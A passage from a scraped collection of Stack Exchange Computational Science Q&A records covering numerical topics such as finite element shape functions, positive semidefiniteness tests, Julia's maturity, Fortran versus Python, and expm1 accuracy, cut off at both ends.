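u_fv = np.linalg.solve(A, b)

print(u_fe.max(), u_fv.max())            # both approach the exact peak u(1/2) = 1/8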
8,223 | I would like to know if there is a quick way to compute the Euclidean distance of two vectors in Octave. It seems that there is no special function for that, so should I just use the formula with sqrt ? | The Euclidean distance between two vectors is the two-norm of their difference, hence d = norm( x1 - x2 , 2 ); should do the trick in Octave. Note that if the second argument to norm is omitted, the 2-norm is used by default. | {
"source": [
"https://scicomp.stackexchange.com/questions/8223",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4958/"
]
} |
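For reference, the same computation in Python/NumPy (an equivalent one-liner, not something from the answer above); np.linalg.norm likewise defaults to the 2-norm:

>>> import numpy as np
>>> x1 = np.array([1.0, 2.0, 3.0]); x2 = np.array([4.0, 6.0, 3.0])
>>> np.linalg.norm(x1 - x2)
5.0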
8,404 | I need to write some data from a computation that will be read later by Paraview (.vtu or .vtk file). When it comes to file size, should I go for the ASCII format or the binary format? | If your only worry is file size, then you want binary files. For an illustrative example, let's assume you are writing 1 double precision floating point number to a file. Let's assume that the file system handles this perfectly, so that file headers and padding cost nothing. For a binary file, that number would take the exact size of the number in RAM, or 8 bytes. In ASCII format, it would hold: 16 digits for the significand, 1 character for the decimal point, 1 character to delimit the exponent, 1 character for the sign of the exponent, and 2-3 characters for the exponent itself. Assuming only 1 byte per character, that is about 22 bytes to hold the same number. This doesn't count the characters required to delimit between numbers (usually at least 1). Therefore the file size for the ASCII format will be about 3 times larger. You can trade file size for precision in the stored files (only keep 5-6 significant digits), but that depends on what you are using them for. The main advantage of ASCII is for debugging or producing human readable data. | {
"source": [
"https://scicomp.stackexchange.com/questions/8404",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4964/"
]
} |
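A quick way to see the roughly threefold size difference described in the answer above, using NumPy (the array length and file names are illustrative; the exact ASCII size depends on the chosen format string):

import os
import numpy as np

a = np.random.rand(100000)            # 100000 doubles: 800000 bytes in memory

a.tofile("data.bin")                  # raw binary dump of the array
np.savetxt("data.txt", a)             # ASCII, default format '%.18e'

print(os.path.getsize("data.bin"))    # 800000
print(os.path.getsize("data.txt"))    # roughly 2.5 MB, about 25 characters per value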
8,998 | I apologize if this is a vague question, but here goes: Over the past few years, functional programming has received a lot of attention in the Software Engineering community. Many have started using languages such as Scala and Haskell and claimed success over other programming languages and paradigms. My question is: as high performance computing / scientific computing experts, should we be interested in functional programming? Should we be participating in this mini-revolution? What are the pros and cons of functional programming in the SciComp domain of work? | I've only done a little bit of functional programming, so take this answer with a grain of salt. Pros: Functional programming looks very mathematical; it's a nice paradigm for expressing some mathematical concepts There are good libraries available for things like formal verification of programs and theorem proving, so it's possible to write programs that reason about programs -- this aspect is good for reproducibility You can do functional programming in Python and C++ via lambda expressions; you can also do functional programming in Julia and Mathematica Not many people use it, so you can be a pioneer. Much like there were early adopters of MATLAB, Python, R, and now Julia, there need to be early adopters of functional programming for it to catch on Cons: Languages that are typically thought of as functional programming languages, like Haskell, OCaml (and other ML dialects), and Lisp are generally thought of as slow relative to languages used for performance-critical scientific computing. OCaml is, at best, around half as fast as C. These languages lack library infrastructure compared to languages commonly used in computational science (Fortran, C, C++, Python); if you want to solve a PDE, it's way easier to do it in a language more commonly used in computational science than one that is not. There isn't as much of a computational science community using functional programming languages as there is using procedural languages, which means you won't get a whole lot of help learning it or debugging it, and people are probably going to give you crap for using it (whether or not you deserve it) The style of functional programming is different than the style used in procedural programming, which is typically taught in introductory computer science classes and in "MATLAB for Scientists and Engineers"-type classes I think many of the objections in the "Cons" section could be overcome. As is a common point of discussion on this Stack Exchange site, developer time is more important than execution time. Even if functional programming languages are slow, if performance-critical portions can be delegated to a faster procedural language and if productivity gains can be demonstrated through rapid application development, then they might be worth using. It's worth noting here that programs implemented in pure Python, pure MATLAB, and pure R are considerably slower than implementations of these same programs in C, C++, or Fortran. Languages like Python, MATLAB, and R are popular precisely because they trade execution speed for productivity, and even then, Python and MATLAB both have facilities for implementing interfaces to compiled code in C or C++ so that performance-critical code can be implemented to execute quickly. Most languages have a foreign function interface to C, which would be enough to interface with most libraries of interest to computational scientists. Should you be interested in functional programming? 
That all depends on what you think is cool. If you're the type of person who is willing to buck convention and you're willing to go through the slog of evangelizing to people about the virtues of whatever it is you want to do with functional programming, I'd say go for it. I would love to see people do cool things with functional programming in computational science, if for no other reason than to prove all of the naysayers wrong (and there will be a lot of naysayers). If you're not the type of person who wants to deal with a bunch of people asking you, "Why in hell are you using a functional programming language instead of (insert their favorite procedural programming language here)?", then I wouldn't bother. There's been some use of functional programming languages for simulation-intensive work. The quantitative trading firm Jane Street uses OCaml for financial modeling and execution of its trading strategies. OCaml was also used in FFTW for generating some C code used in the library. Liszt is a domain-specific language developed at Stanford and implemented in Scala that is used for solving PDEs. Functional programming is definitely used in industry (not necessarily in computational science); it remains to be seen whether it will take off in computational science. | {
"source": [
"https://scicomp.stackexchange.com/questions/8998",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/529/"
]
} |
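As a small, concrete taste of the style in a numerical setting — using Python, since the answer above notes that functional programming is possible there via lambda expressions — here is an illustrative sketch built from pure functions and functools.reduce; the example itself is made up, not drawn from the answer.

from functools import reduce
import math

def compose(*fs):
    """Right-to-left composition of single-argument functions."""
    return reduce(lambda f, g: (lambda x: f(g(x))), fs)

scale = lambda a: (lambda x: a * x)          # pure building blocks
shift = lambda b: (lambda x: x + b)

# Map Chebyshev nodes from [-1, 1] onto an arbitrary interval [lo, hi].
to_interval = lambda lo, hi: compose(shift((lo + hi) / 2), scale((hi - lo) / 2))

nodes = [math.cos((2 * k + 1) * math.pi / 20) for k in range(10)]
print(list(map(to_interval(0.0, 2.0), nodes)))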
10,678 | I just started studying FEM in a more structured basis compared to what I used to do during my undergraduate courses. I am doing this because, despite the fact that I can use the "FEM" in commercial (and other non-commercial) software, I would like to really understand the underground techniques that support the method. That's why I am coming here with such, at least for the experienced user of the technique, basic question. Now I'm reading a quite popular (I think) and "engineer-friendly" book called "Finite element method- The basics" from Zienkwicz. I've been reading this book from the first page but I yet can't understand the concept of shape function in the way Zienkwicz explains it. What I know about from the things that I'd read is that a "Stiffness" matrix, the one that relates the unknowns with the result ($A$ in: $Ak=b$), has its components from the "relationships between the nodes", and if that "relationship" changes, (i.e. if we change it to a Higher order interpolant), that stiffness matrix changes, because the relationship between the nodes does. But in this book, the definition is quite fuzzy for me, because in some point it says that you can arbitrarily chose the function as, i.e., the identity matrix: The only explanation I found is in this blog , but it is still not so clear for me. So, somebody can give me a simple plain explanation of what is a Shape functon and how it is done to "put it" in the stifness matrix? | I've always found the approach to describing finite element methods that focuses on the discrete linear system and works backward unnecessarily confusing. It is much clearer to go the other way, even if that involves a bit of mathematical notation in the beginning (which I'll try to keep to a minimum). Assume that you are trying to solve an equation $A u = f$ for given $f$ and unknown $u$ , where $A$ is a linear operator that maps functions (e.g., describing the displacement at every point $(x,y)$ in a domain) in a space $V$ to functions in another space (e.g., describing the applied forces). Since the function space $V$ is usually infinite-dimensional, this system cannot be solved numerically. The standard approach is therefore to replace $V$ by a finite-dimensional subspace $V_h$ and look for $u_h \in V_h$ satisfying $Au_h = f$ . This is still infinite-dimensional due to the range space (which we'll assume for simplicity to be $V$ as well), so we just ask for the residual $Au_h-f\in V$ to be orthogonal to $V_h$ -- or equivalently, that $v_h^T(Au_h-f) = 0$ for every basis vector $v_h$ in $V_h$ . If we now write the $u_h$ as a linear combination of these basis vectors, we are left with a linear system for the unknown coefficients in this combination. (The terms $v_i^TAu_j$ are exactly the entries of the stiffness matrix $K_{ij}$ , and $v_j^Tf$ are the entries of the load vector. If $A$ is a differential operator, one usually performs integration by parts at some point, but this is not important here.) None of this so far is specific to finite element methods, but applies to any so-called Galerkin method or method of weighted residuals.
The finite element method is characterized by a special choice of $V_h$ : The computational domain is decomposed into a number of elements of the same basic shape (e.g., triangles; the process is often called triangulation ), and the space $V_h$ is chosen such that restricted to each element, functions in $V_h$ are polynomials (e.g, linear in $x$ and $y$ ). Furthermore, the basis functions are chosen such that they are non-zero only in (the neighborhood of) one of the elements. The point of this choice is that you can build such a basis of $V_h$ fairly easily by finding a basis $\{\psi_j\}$ of the polynomial space on a single reference element (such as the triangle with vertices $(0,0)$ , $(0,1)$ and $(1,0)$ ) and then using an affine transformation to map these basis functions to basis functions on each element in the triangulation. These $\psi_j$ are the shape functions. Usually, one requires that the local basis functions take the value $1$ at only one of the vertices and $0$ at the others (called a nodal basis ), which is what the page you linked is talking about. Like any polynomial, these are uniquely determined by a number of interpolation conditions (e.g., a polynomial of degree $1$ on an interval is determined by its value at two distinct points; if the basis is a nodal basis, these values are taken at the vertices), which are also referred to as the degrees of freedom of the element. (The total degrees of freedom can be less than the sum of the degrees of all elements if some have to be fixed to ensure global properties of the approximation such as continuity.) (Other choices of $V_h$ lead to other methods; in fact, there are spectral methods where the basis functions are chosen such that the stiffness matrix is the identity. Of course, there's no free lunch, so other parts of the procedure become more difficult with this basis. Similarly, there are other interpolation conditions than point evaluations, such as derivative evaluations or averages over elements or sides.) | {
"source": [
"https://scicomp.stackexchange.com/questions/10678",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/5083/"
]
} |
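To connect the abstract description in the answer above to a computation, here is a sketch (in Python, and in 1D for brevity) of the two linear nodal shape functions on a reference element and of how their derivatives produce the element contributions that get assembled into the stiffness matrix K. The 1D Poisson setting is an illustrative simplification, not taken from the book or the answer.

import numpy as np

# Nodal (hat) shape functions on the reference element [0, 1]:
# psi_0(0) = 1, psi_0(1) = 0   and   psi_1(0) = 0, psi_1(1) = 1
psi  = [lambda s: 1.0 - s, lambda s: s]
dpsi = [-1.0, 1.0]                           # their (constant) derivatives

# nodal basis = partition of unity on the element
assert all(abs(psi[0](s) + psi[1](s) - 1.0) < 1e-15 for s in (0.0, 0.3, 1.0))

def element_stiffness(h):
    # K_e[a, b] = integral over the element of psi_a'(x) * psi_b'(x) dx
    #           = dpsi[a] * dpsi[b] / h  after mapping [0, 1] to an element of size h
    Ke = np.empty((2, 2))
    for a in range(2):
        for b in range(2):
            Ke[a, b] = dpsi[a] * dpsi[b] / h
    return Ke

N = 4
h = 1.0 / N
K = np.zeros((N + 1, N + 1))
for e in range(N):                                # add each element's 2x2 block to the
    K[e:e + 2, e:e + 2] += element_stiffness(h)   # rows/columns of its two nodes
print(K * h)                                      # the familiar [-1, 2, -1] pattern away from the boundary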
10,922 | I'm considering learning a new language to use for numerical/simulation modelling projects, as a (partial) replacement for the C++ and Python that I currently use. I came across Julia , which sounds kind of perfect. If it does everything it claims, I could use it to replace both C++ and Python in all my projects, since it can access high-level scientific computing library code (including PyPlot) as well as running for loops at a similar speed to C. I would also benefit from things like proper coroutines that don't exist in either of the other languages. However, it's a relatively new project, currently at version 0.x, and I found various warnings (posted at various dates in the past) that it's not quite ready for the day to day use. Consequently, I would like some information about the status of the project right now (February 2014, or whenever an answer is posted), in order to help me assess whether I personally should consider investing the time to learn this language at this stage. I would appreciate answers that focus on specific relevant facts about the Julia project ; I'm less interested in opinions based on experience with other projects. In particular, a comment by Geoff Oxberry suggests that the Julia API is still in a state of flux, requiring the code to be updated when it changes. I would like to get an idea of the extent to which this is the case: which areas of the API are stable, and which are likely to change? I guess typically I would mostly be doing linear algebra (e.g. solving eigenproblems), numerical integration of ODEs with many variables, and plotting using PyPlot and/or OpenGL, as well as low-level C-style number crunching (e.g. for Monte Carlo simulations). Is Julia's library system fully developed in these areas? In particular, is the API more or less stable for those types of activities, or would I find that my old code would tend to break after upgrading to a new version of Julia? Finally, are there any other issues that would be worth considering in deciding whether to use Julia for serious work at the present time? | Julia, at this point (May 2019, Julia v1.1 with v1.2 about to come out) is quite mature for scientific computing. The v1.0 release signified an end to yearly code breakage . With that, a lot of scientific computing libraries have had the time to simply grow without disruption. A broad overview of Julia packages can be found at pkg.julialang.org . For core scientific computing, the DifferentialEquations.jl library for differential equations (ODEs, SDEs, DAEs, DDEs, Gillespie simulations, etc.), Flux.jl for neural networks, and the JuMP library for mathematical programming (optimization: linear, quadratic, mixed integer, etc. programming) are three of the cornerstones of the scientific computing ecosystem. The differential equation library in particular is far more developed than what you'd see in other languages, with a large development team implementing features like EPIRK integrators , Runge-Kutta-Nystrom , Stiff/Differential-Algebraic delay differential equation , and adaptive time stiff stochastic differential equation integrators, along with a bunch of other goodies like adjoint sensitivity analysis , chemical reaction DSLs , matrix-free Newton-Krylov, and full (data transfer free) GPU compatibility, with training of neural differential equations , all with fantastic benchmark results (disclaimer: I am the lead developer). The thing that is a little mind-boggling about the matured Julia ecosystem is its composibility. 
Essentially, when someone builds a generic library function like those in DifferentialEquations.jl, you can use any AbstractArray/Number type to generate new code on the fly. So for example, there is a library for error propagation ( Measurements.jl ) and when you stick it in the ODE solver, it automatically compiles a new version of the ODE solver which does error propagation without parameter sampling . Because of this, you may not find some features documented because the code for the features generates itself, and so you need to think more about library composition. One of the ways where composition is most useful is in linear algebra. The ODE solvers for example allow you to specify jac_prototype , letting you give it the type for the Jacobian that will be used internally. Of course there's things in the LineraAlgebra standard library like Symmetric and Tridiagonal you can use here, but given the utility of composibility in type generic algorithms, people have by now gone and built entire array type libraries. BandedMatrices.jl and BlockBandedMatrices.jl are libraries which define (Block) banded matrix types which have fast lu overloads, making them a nice way to accelerate the solution of stiff MOL discretizations of systems of partial differential equations. PDMats.jl allows for the specification of positive-definite matrices. Elemental.jl allows you to define a distributed sparse Jacobian. CuArrays.jl defines arrays on the GPU. Etc. Then you have all of your number types. Unitful.jl does unit checking at compile time so it's an overhead-free units library. DoubleFloats.jl is a fast higher precision library, along with Quadmath.jl and ArbFloats.jl . ForwardDiff.jl is a library for forward-mode automatic differentiation which uses Dual number arithmetic. And I can keep going listing these out. And yes, you can throw them into sufficiently generic Julia libraries like DifferentialEquations.jl to compile a version specifically optimized for these number types. Even something like ApproxFun.jl which is functions as algebraic objects (like Chebfun) works with this generic system, allowing the specification of PDEs as ODEs on scalars in a function space. Given the advantages of composibility and the way that types can be use to generate new and efficient code on generic Julia functions, there has been a lot of work to get implementations of core scientific computing functionality into pure Julia. Optim.jl for nonlinear optimization, NLsolve.jl for solving nonlinear systems, IterativeSolvers.jl for iterative solvers of linear systems and eigensystems, BlackBoxOptim.jl for black-box optimization, etc. Even the neural network library Flux.jl just uses CuArrays.jl's automatic compilation of code to the GPU for its GPU capabilities. This composibility was the core of what created things like neural differential equations in DiffEqFlux.jl . Probabilistic programming languages like Turing.jl are also quite mature now and make use of the same underlying tooling. Since Julia's libraries are so fundamentally based on code generation tools, it should be no surprised that there's a lot of tooling around code generation. Julia's broadcast system generates fused kernels on the fly which are overloaded by array types to give a lot of the features mentioned above. CUDAnative.jl allows for compiling Julia code to GPU kernels. ModelingToolkit.jl automatically de-sugars ASTs into a symbolic system for transforming mathematical code. 
Cassette.jl lets you "overdub" someone else's existing function, using rules to change their function before compile time (for example: change all of their array allocations to static array allocations and move operations to the GPU). This is more advanced tooling (I don't expect everyone doing scientific computing to take direct control of the compiler), but this is how a lot of the next generation tooling is being built (or rather, how the features are writing themselves). As for parallelism, I've mentioned GPUs, and Julia has built-in multithreading and distributed computing . Julia's multithreading will very soon use a parallel-tasks runtime (PARTR) architecture which allows for automated scheduling of nested multithreading . If you want to use MPI, you can just use MPI.jl . And then of course, the easiest way to make use of it all is to just use an AbstractArray type setup to use the parallelism in its operations. Julia also has the basic underlying ecosystem you would expect of a general purpose language used for scientific applications. It has the Juno IDE with a built-in debugger with breakpoints , it has Plots.jl for making all sorts of plots. A lot of specific tools are nice as well, like Revise.jl automatically updates your functions/library when a file saves. You have your DataFrames.jl , statistics libraries , etc. One of the nicest libraries is actually Distributions.jl which lets you write algorithms generic to the distribution (for example: rand(dist) takes a random number of whatever distribution was passed in), and there's a whole load of univariate and multivariate distributions (and of course dispatch happens at compile time, making this all as fast as hardcoding a function specific to the distribution). There is a bunch of data handling tooling , web servers , etc. you name it. At this point it's mature enough that if there's a basic scientific thing and you'd expect for it to exist, you just Google it with .jl or Julia and it'll show up. Then there's a few things to keep in mind on the horizon. PackageCompiler is looking to build binaries from Julia libraries, and it already has some successes but needs more development. Makie.jl is a whole library for GPU-accelerated plotting with interactivity, and it still needs some more work but it's really looking to become the main plotting library in Julia. Zygote.jl is a source-to-source automatic differentiation library which doesn't have the performance issues of a tracing-based AD (Flux's Tracker, PyTorch, Jax), and that is looking to work on all pure Julia codes. Etc. In conclusion, you can find a lot of movement in a lot of places, but in most areas there is already a solid matured library. It's no longer at a place where you ask "will it be adopted?": Julia has been adopted by enough people (millions of downloads) that it has the momentum to stay around for good. It has a really nice community, so if you ever just want to shoot the breeze and talk about parallel computing or numerical differential equations, some of the best chat rooms for that are in the Julialang Slack . Whether it's a language you should learn is a personal question, and whether it's the right language for your project is a technical question, and those are different. But is it a language that has matured and has the backing of a large consistent group of developers? That seems to be an affirmative yes. | {
"source": [
"https://scicomp.stackexchange.com/questions/10922",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/3746/"
]
} |
11,006 | Going to teach students of undergraduate level a course titled Introduction to Computer Programming. I am confused a bit. In Computational Physics scientists use C/C++ or Python or Fortran,CUDA etc..... this is time to build their base. What should I use? I know you can learn new programming language anytime in your life but which is wiser choice for me to elaborate them all basic programming concepts and OOP concepts later on. | First, if your undergraduates are like ours and had no prior introduction to computers, expect to spend some time teaching them how to use basic stuff like using a proper editor (i.e., not MS Word), the command line, etc. I think the answer somewhat depends on where you set the focus of your course (or what you are required to teach). For example: How relevant are the internal workings of the computer? Do you need classes and other advanced OOP structures? Do you want to teach them how to produce efficient programs or are you happy if they produce working programs at all? Also, do not forget that you most probably will need capable tutors. But now something to advantages and disadvantages of the languages, I am familiar with. Note that this is mainly from my experience as a computational physicist and some of this may depend on the particular field, workgroup, university, etc. Python I generally recommend using Numpy from almost the very beginning and I am assuming it to be used in the following. Advantages: It’s easy to learn and so is reading other people’s code (e.g., your example code, but also the students’ code for the tutors). Input and output (which should not be the focus of your course) can be fully covered by print , Numpy’s savetxt and loadtxt , and maybe sys.argv . It can be introduced on the fly and it does not eat much programming time. You do not need to deal with or only need to deal little with such details as number representation, memory management, data types. Thus it’s fast to program and you can focus on the actual algorithms. It‘s not a compiled language. This has two advantages: Students do not need to deal with a compiler and students can test stuff directly in the console without having to compile, restart and rerun the program. Relatedly, debugging is easier. There are easy-to-use libraries for almost everything. You do not need to learn additional script languages like shell scripts, Make, Gnuplot and so on – all this can be done from Python. There are a lot of good tutorials (for free). Disadvantages: It’s not compiled. Therefore Python programs may be drastically slower than compiled programs in some cases relevant to computational physics. In other cases, however, libraries (especially Numpy) can yield a comparable performance. Another way, to get good performances with Python is to write the relevant code snippets in another language like C¹. Obviously you need to learn this language for this, but this can be done later and your time learning Python is not wasted. It’s more difficult to teach such details as number representation, memory management, data types and their pitfalls, since they are somewhat obfuscated. C/C++ Advantages: It is compiled and therefore it’s easier to produce efficient code. You are directly dealing with number representation, memory management, data types and thus it is more intuitive to teach these – your students will get closer to what is really happening in their computer. There are libraries for basically everything but understanding and using a library takes some work. 
There is a relevant amount of existing code in C/C++ and thus students need to learn the language if they want to work with this code. If you already know C/C++, you can learn Python (for example) very fast. Disadvantages: It is compiled and your students have to deal with the compiler, the preprocessor, headers and so on. You would be surprised how much students fail at this step, even at the end of the semester. It is slower too learn and it takes longer to produce working code. Dealing with marginal stuff such as input and output takes some time as well in teaching as in programming. In C++, there is an extra syntax for input and output. Compiler and operating-system dependencies. You have to deal with the C/C++ confusion. Reading the code of other’s especially in C++ can be quite difficult due to the vast amount of syntax features. The main advantages of C++ over C (Classes, templates) should not be relevant for your course and are only becoming relevant for larger projects. Therefore I would choose C of the two, since it is more concise. Others Some comments on the other languages: Fortran: This is still used by a lot of groups and there is a lot of legacy code, but you cannot get around dealing with the old standards and their huge limitations and pitfalls (a lot of people are still working with Fortran 77). Also, it will be much harder to find tutorials, help on the Internet and so on. Matlab/Mathematica: All the problems of proprietary software. Consider in particular that your students are likely to collaborate with people who do not have access to this software and the ensuing problems. Cuda: This is only relevant for certain problems, if performance matters. Also, after all I know, you do not want to learn programming this way. ¹ Which is the standard workflow at least in our group. | {
"source": [
"https://scicomp.stackexchange.com/questions/11006",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/7572/"
]
} |
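To illustrate the claim above that print, Numpy's savetxt/loadtxt, and sys.argv cover the input/output needs of such a course, a minimal sketch (the file names and the processing step are made up):

import sys
import numpy as np

infile = sys.argv[1] if len(sys.argv) > 1 else "data.txt"

x = np.loadtxt(infile)               # whitespace-separated numbers
print("read", x.size, "values, mean =", x.mean())
np.savetxt("result.txt", x - x.mean())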
11,017 | I'm trying to get a frequency plot, or PDF (probability density function) plot for my biometrics project in MATLAB.
I have two vectors genuine_scores and impostor_scores , and I need to have a graph like: x-axis : value of elements
y-axis : frequency of that value. So the graph should look like this: I tried probplot() but it gives the cumulative distribution function. I also tried normpdf(), but it does not make sense to me, because I'm not interested in a mean value. I just need how frequently each value appears in the vector(s). Thanks for any help! | | {
"source": [
"https://scicomp.stackexchange.com/questions/11017",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/7580/"
]
} |
11,514 | Which one is better: FORTRAN or Python? And I guess that in both cases you need Gnuplot, am I right? I'm working on a Windows machine at the moment. I'd like to use it to get numerical solutions for physics-problems, including Monte-Carlo simulations, numerical integration and differentiation, molecular dynamics, etc. I saw a course on computational physics which introduces both FORTRAN (77 I believe) and Python. I'm planning to start with one and then learn the other, but I don't know which transition might be the easiest. Also which compilers would you recommend? The basic question for me comes down to: which one is the easiest to learn, which one is the fastest, which one is most user-friendly and above all which one is most used (so a comparison of these 4)? And next to that, what are the most common (free or paid) compilers in use? I'm currently considering converting an old laptop (early Intel dual core) to Linux; hopefully that's fast enough. Thanks a lot for the answers so far! The answers which are in line with what I'm looking for are those of LKlevin and SAAD. I know the basics of C++, Maple and I master MATLAB and Mathematica9 almost completely if that's any help. | Ease of learning Python and Fortran are both relatively easy-to-learn languages. It's probably easier to find good Python learning materials than good Fortran learning materials because Python is used more widely, and Fortran is currently considered a "specialty" language for numerical computing. I believe the transition from Python to Fortran would be easier. Python is an interpreted language, so the number of steps it takes to get your first program running is smaller (open the interpreter, type print("Hello, world!") at the prompt) than it is for Fortran (write a "Hello world" program, compile, run). I also think that there are better materials to teach object-oriented style in Python than in Fortran, and there's more Python code available on GitHub than Fortran code. Getting up and running on Windows Installing Python should be less painful; there are Windows distributions available. I recommend using a scientific distribution like Anaconda or Enthought Canopy. There's not really a compiler, per se; the interpreter takes that role. You'll want to use a CPython-based interpreter, because there are more numerical libraries available and it interoperates nicely with C, C++, and Fortran. Other interpreter implementations include Jython and PyPy. On a Windows machine, installing a Fortran compiler is going to be annoying. Typical command-line compilers are programs like gfortran, ifort (from Intel; free for personal use, otherwise costs money), and pgfortran (from PGI; free trial versions, otherwise costs money). To install these compilers, you might need to install some sort of UNIX/POSIX-type compatibility layer, like Cygwin or MinGW. I found it a pain to work with, but some people like that workflow. You could also install a compiler with a GUI, like Visual Fortran (again, you'd have to pay for a license). Windows Subsystem for Linux (WSL) could also be used to install gfortran compiler in Windows. On Linux, it will be easier to install Python and compilers; I would still install Anaconda or Enthought Canopy as a Python distribution. Speed: a productivity vs. performance tradeoff In using Python (or MATLAB, Mathematica, Maple, or any interpreted language), you give up performance for productivity. 
Compared to Fortran (or C++, C, or any other compiled language), you will write fewer lines of code to accomplish the same task, which generally means it will take you less time to get a working solution. The effective performance penalty for using Python varies, and is mitigated by delegating computationally intensive tasks to compiled languages. MATLAB does something similar. When you do a matrix multiplication in MATLAB, it calls BLAS; the performance penalty is virtually zero, and you didn't have to write any Fortran, C, or C++ to get the high performance. A similar situation exists in Python. If you can use libraries (for example, NumPy, SciPy, petsc4py, dolfin from FEniCS, PyClaw), you can write all of your code in Python and get good performance (a penalty of maybe 10-40%) because all of the computationally intensive parts are calls to fast compiled language libraries. However, if you were to write everything in pure Python, the performance penalty would be a factor of 100-1000x. So if you wanted to use Python and had to include a custom, computationally intensive routine, you would be better off writing that part in a compiled language like C, C++, or Fortran, then wrapping it with a Python interface. There are libraries that facilitate this process (like Cython and f2py), and tutorials to help you; it is generally not onerous. Scope of use Python is used more widely overall as a general-purpose language. Fortran is largely limited to numerical and scientific computing, and is mainly competing with C and C++ for users in that domain. In computational science, Python typically doesn't compete directly with compiled languages due to the performance penalties I mentioned. You would use Python for cases where you want high productivity and performance is a secondary consideration, such as in prototyping numerically intensive algorithms, data processing, and visualization. You would use Fortran (or another compiled language) when you have a good idea of what your algorithm and application design should be, you're willing to spend more time writing and debugging your code, and performance is paramount. (For instance, performance is a limiting step in your simulation process, or it is a key deliverable in your research.) A common strategy is to mix Python and a compiled language (usually C or C++, but Fortran has been used also), and only use the compiled language for the most performance-sensitive parts of the code; the development cost is, of course, that it's harder to write and debug a program in two languages than a program in a single language. In terms of parallelism, the current MPI standard (MPI-3) has native Fortran and C bindings. The MPI-2 standard had native C++ bindings, but MPI-3 does not, and you would have to use the C bindings. Third-party MPI bindings exist, such as mpi4py. I've used mpi4py; it works well, and is straightforward to use. For large-scale parallelism (tens of thousands of cores), you'd probably want to use a compiled language because things like dynamically loading the Python modules will bite you in the ass at scale if you do it in a naïve way. There are ways to get around that bottleneck, as demonstrated by the PyClaw developers, but it's simpler to avoid it. Personal opinions I have roughly a decade of experience in Fortran 90/95, and I've also programmed in Fortran 2003. I have roughly five years of experience programming in Python. I use Python much more than I use Fortran because, frankly, I get more done in Python. 
The majority of the work I need to do does not require major supercomputing resources and is generally not worth re-developing in another language, so Python is just fine for solving ODEs and PDEs. If I need to use a compiled language, I will use C, C++, or Fortran, in that order. Most of the Fortran code I've seen has been ugly, mainly because most of the computational science community seems unaware of or averse to any best practices discovered by software engineers in the last 30 years. To wit: there is no good unit testing framework in Fortran. (The best I came across is FUnit, by NASA, and that's not maintained anymore.) There are a few good Python unit testing frameworks, good Python documentation generators, and generally many better examples of good programming practices. | {
"source": [
"https://scicomp.stackexchange.com/questions/11514",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4811/"
]
} |
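A small experiment illustrating the trade-off described above — the same reduction written as a pure Python loop and as a single call into NumPy's compiled routines. The array size is arbitrary and the measured ratio will vary by machine; it is only meant to show the order of magnitude being discussed.

import time
import numpy as np

x = np.random.rand(5_000_000)

t0 = time.perf_counter()
s = 0.0
for v in x:                          # pure Python: interpreter overhead for every element
    s += v * v
t1 = time.perf_counter()

t2 = time.perf_counter()
s_np = float(np.dot(x, x))           # delegated to compiled BLAS/NumPy internals
t3 = time.perf_counter()

print(f"loop: {t1 - t0:.3f} s, numpy: {t3 - t2:.5f} s, agree: {np.isclose(s, s_np)}")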
12,979 | I have a list ${\cal L}$ of symmetric matrices that I need to check for positive semi-definiteness (i.e., their eigenvalues are non-negative). One could do this by computing the respective eigenvalues and checking if they are non-negative (perhaps having to take care of rounding errors). Computing the eigenvalues is quite expensive in my scenario, but I have noticed that the library I am using has quite a fast test for positive definiteness (that is, whether the eigenvalues of a matrix are strictly positive). Hence the idea would be that, given a matrix $B \in {\cal L}$, one tests if $B + \epsilon I$ is positive definite. If it is not, then $B$ is not positive semi-definite; otherwise one can compute the eigenvalues of $B$ to make sure it is indeed positive semi-definite. My question now is: Is there a more direct and efficient way of testing whether a matrix
is positive semi-definite, provided that an efficient test for
positive definiteness is given? | What's your working definition of "positive semidefinite" or "positive definite"? In floating point arithmetic, you'll have to specify some kind of tolerance for this. You could define this in terms of the computed eigenvalues of the matrix. However, you should first notice that the computed eigenvalues of a matrix scale linearly with the matrix, so that for example, the matrix I get by multiplying $A$ by a factor of one million has its eigenvalues multiplied by a million. Is $\lambda=-1.0$ a negative eigenvalue? If all of the other eigenvalues of your matrix are positive and on the order of $10^{30}$, then $\lambda=-1.0$ is effectively 0 and shouldn't be treated as a negative eigenvalue. Thus it's important to take scaling into account. A reasonable approach is to compute the eigenvalues of your matrix, and declare that the matrix is numerically positive semidefinite if all eigenvalues are larger than $-\epsilon \left| \lambda_{\max} \right|$, where $ \lambda_{\max}$ is the largest eigenvalue. Unfortunately, computing all of the eigenvalues of a matrix is rather time consuming. Another commonly used approach is that a symmetric matrix is considered to be positive definite if the matrix has a Cholesky factorization in floating point arithmetic. Computing the Cholesky factorization is an order of magnitude faster than computing the eigenvalues. You can extend this to positive semidefiniteness by adding a small multiple of the identity to the matrix. Again, there are scaling issues. One fast approach is to do a symmetric scaling of the matrix so that the diagonal elements are 1.0 and add $\epsilon$ to the diagonal before computing the Cholesky factorization. You should be careful with this though, because there are some problems with the approach. For example, there are circumstances where the $A$ and $B$ are postive definite in the sense that they have floating point Cholesky factorizations, but $(A+B)/2$ does not have a Cholesky factorization. Thus the set of "floating point Cholesky factorizable positive definite matrices" isn't convex! | {
"source": [
"https://scicomp.stackexchange.com/questions/12979",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/4582/"
]
} |
20,629 | I have a simple question that is really hard to Google (besides the canonical What Every Computer Scientist Should Know About Floating-Point Arithmetic paper). When should functions such as log1p or expm1 be used instead of log and exp ? When should they not be used? How do different implementations of those functions differ in terms of their usage? | We all know that \begin{equation}
\exp(x) = \sum_{n=0}^\infty \frac{x^n}{n!} = 1 + x + \frac12 x^2 + \dots
\end{equation} implies that for $|x| \ll 1$ , we have $\exp(x) \approx 1 + x$ . This means that if we have to evaluate in floating point $\exp(x) -1$ , for $|x| \ll 1$ catastrophic cancellation can occur. This can be easily demonstrated in python: >>> from math import (exp, expm1)
>>> x = 1e-8
>>> exp(x) - 1
9.99999993922529e-09
>>> expm1(x)
1.0000000050000001e-08
>>> x = 1e-22
>>> exp(x) - 1
